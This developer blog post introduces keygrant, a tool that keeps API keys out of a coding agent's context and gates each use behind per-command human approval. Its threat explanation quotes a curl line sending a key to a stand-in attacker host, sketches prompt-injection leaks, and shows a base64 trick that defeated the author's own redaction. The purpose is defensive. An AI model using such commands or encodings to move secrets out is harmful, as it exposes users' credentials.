blog

Claude Code keeps printing my secrets: why hook redaction isn't enough

2026-10-10 · originally published on DEV

If you use Claude Code (or any coding agent) against real APIs, you have probably watched it do this: you ask it to call Stripe, it runs env or cat .env to “check the configuration”, and your live key scrolls past in the transcript.

You’re not alone. The Claude Code issue tracker has a run of reports with the same shape:

Most of these are closed and locked, so if you landed here from a search, this post is the reply I couldn’t leave on them.

Why this matters more than “oops, it’s in my scrollback”

A secret that reaches the model’s context can leave through every channel the agent has: a reply, generated code that gets committed, a URL in a tool call, request logs, observability tools that store full prompts, a shared session transcript.

And agents spend all day reading untrusted input: issues, READMEs, web pages, other MCP servers’ results. Prompt injection turns that into an exfiltration path. Invariant Labs showed a single malicious GitHub issue making an agent leak private-repo data, and EchoLeak (CVE-2025-32711) was a zero-click exfiltration in M365 Copilot. Models are trained to resist this. Nobody claims the failure rate is zero, and a leaked key only has to leak once.

The community fix: redact the output with hooks

The common workaround is a PostToolUse hook that rewrites tool output and masks anything that looks like a key. It helps, but it has three structural problems.

1. It runs after the fact. By the time a hook sees the output, the value is already in the agent’s process environment and the agent can use it. Redacting the transcript does nothing about curl "https://evil.example/?k=$STRIPE_KEY": the model never needed to see the value to send it.

2. It can’t catch what never hits output. When the model inlines a secret into a tool-call argument (#56025), the leak happens on the way in, before any output hook runs.

3. Format blocklists miss formats. Most redaction matches patterns that “look like” credentials: sk-..., ghp_..., AKIA.... Every provider invents a new prefix, and a blocklist only knows the ones someone wrote down. There are also plumbing traps: a reported bug where output rewriting is silently ignored for the built-in Bash tool (#68951).

Hooks treat the symptom. The cause is that the value is somewhere the agent can reach.

The architectural fix: names for the model, values for the process

Your shell has offered the right split for fifty years:

model context:       STRIPE_KEY        (the name: harmless)
child process env:   sk-live-...       (the value: injected at exec time)

The model writes curl -H "Authorization: Bearer $STRIPE_KEY" ... and never learns what the variable expands to. The trick is making sure the value is not in the agent’s own environment, only in the one child process that needs it.

I built keygrant to make that split the default:

keygrant: the agent requests a secret, a native dialog shows the exact command, output comes back redacted

It’s an MCP server with exactly two tools:

There is deliberately no tool to store a secret. If the model could write a value through a tool call, the value would be in context, and the whole design would be void. Values go in out-of-band, through stdin.

Approval, per command

Keeping values out of context still leaves problem 1: an injected agent can use a key it has never seen. Only a human can tell whether a given use is intended.

So every exec_with_secrets call pops a native OS dialog showing the session, the secrets and the full command. An approval covers that exact command string, in that one agent session, for 15 minutes, held in memory only. A different command asks again; the same command repeated does not, so you don’t get trained into clicking Allow without reading.

My first version granted “this key, this session, 15 minutes”. My own security review killed it: approve one honest curl api.stripe.com and the malicious curl that follows rides the same grant. Binding to the exact command fixed it.

If you’re away from the machine, an unanswered dialog can escalate to your phone. The verdict is signed by a key generated in the phone’s browser, over a hash of the full request, and the CLI verifies it against the request it actually holds. The relay server can’t approve on your behalf, or show your phone one command while releasing another.

Redaction, by value, as a second line

Output still gets redacted before it returns to the model, but by the known value of each injected secret, not by format guesses. There’s no blocklist to miss a provider’s new prefix. Plaintext, hex, URL-encoding and base64 are covered.

The bug I found in my own redaction

While writing this up I tried the obvious attack against my own tool:

keygrant exec --redact STRIPE_KEY -- \
  sh -c 'echo "Authorization: Bearer $STRIPE_KEY" | base64'

The old version printed the key, encoded, in full.

Base64 encodes in 3-byte groups, so the same key encodes to completely different characters depending on what comes before it. "Authorization: Bearer " is 22 bytes, not a multiple of 3, which shifts the key into a different alignment. My redaction only matched the key encoded on its own, at offset 0. Anything in front of it, and the whole key was recoverable from the output.

The fix: encode the secret at all three alignments and match only the middle characters that depend on the key alone. The edge characters mix in a few bits of the neighbouring bytes and can’t reconstruct the key. The regression test tries to decode the key back out of redacted output at every alignment; the old code failed 92 cases. Fixed in 0.1.6:

QXV0aG9yaXphdGlvbjogQmVhcmVyIH[STRIPE_KEY:base64:REDACTED]Ao=

It’s also the best argument for the architecture. Redaction is a backstop, and backstops have holes. The boundary is the value never reaching the agent.

What this doesn’t protect against

Try it

uv tool install keygrant      # or: pipx install keygrant (Python >= 3.10)
keygrant init                 # writes .mcp.json + CLAUDE.md guidance
echo "sk-..." | keygrant set STRIPE_KEY --desc "stripe, test mode"

Restart Claude Code and ask it to “list recent Stripe charges with STRIPE_KEY”. It will write $STRIPE_KEY into the command, and you approve it in the dialog. Or register it for every project:

claude mcp add --scope user keygrant -- keygrant mcp

No account, local only, Apache-2.0, no third-party dependencies in the core. It’s also listed in the official MCP Registry as io.github.bazingaedward/keygrant.

If you’ve found an encoding the redaction misses, a hole in the threat model, or a platform where the dialog misbehaves, I’d genuinely like to hear it in the comments or an issue.